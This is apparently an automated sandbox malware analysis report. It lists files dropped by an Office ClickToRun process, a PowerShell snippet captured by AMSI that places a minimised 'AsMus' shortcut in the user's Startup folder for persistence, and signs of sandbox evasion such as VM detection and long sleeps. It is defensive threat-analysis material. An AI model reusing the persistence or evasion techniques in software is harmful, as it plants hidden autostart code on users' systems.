    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVScripting.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.hi-in.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.el-gr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\policy.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVCatalog.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\ucrtbase.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppvIsvSubsystems32.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RUI.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\officeinventory.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\msix.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-file-l2-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-environment-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\AppVIsvSubsystemController.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\InspectorOfficeGadget.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.hu-hu.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.pl-pl.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\IntegratedOffice.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.nb-no.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2R64.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvApi.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.sv-se.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\offreg.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\OfficeClickToRun.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\OfficeC2RCom.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-crt-convert-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeClickToRun.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\ucrtbase.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.fr-fr.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\c2r32werhandler.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\vccorlib140.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-timezone-l1-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\IntegratedOffice.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.pt-pt.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.hr-hr.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\OfficeOEMPlugin.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\AppVIsvSubsystemController.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2R64.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\concrt140.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\C2RINTL.sr-latn-rs.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\MavInject32.exeJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.fr-ca.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.es-es.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\C2RINTL.ms-my.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\appvcleaner.exe (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\api-ms-win-core-xstate-l2-1-0.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FA\OfficeOEMPlugin.dll (copy)Jump to dropped file
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\Updates\DD0B7296-BCED-42BE-ACA9-8C0149BDE9FAOfficeC2R58EA58FC-B18F-4931-BEB7-41B15041E45A\manageability.dllJump to dropped file

    Boot Survival

    barindex
    Powershell creates an autostart link
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk' $WScriptShell = New-Object -ComObject WScript.Shell $Shortcut = $WScriptShell.CreateShortcut($ShortcutPath) $Shortcut.TargetPath = $ExePath $Shortcut.WorkingDirectory = Split-Path -Parent $ExePath $Shortcut.WindowStyle = 7 $Shortcut.Description = 'AsMus' $Shortcut.Save() @{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Script
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AsMus.lnkJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AsMus.lnkJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpRegistry key monitored for changes: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData 1.16Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Query firmware table information (likely to detect VMs)
    Source: C:\Users\user\AppData\Local\Temp\872C.tmpSystem information queried: FirmwareTableInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
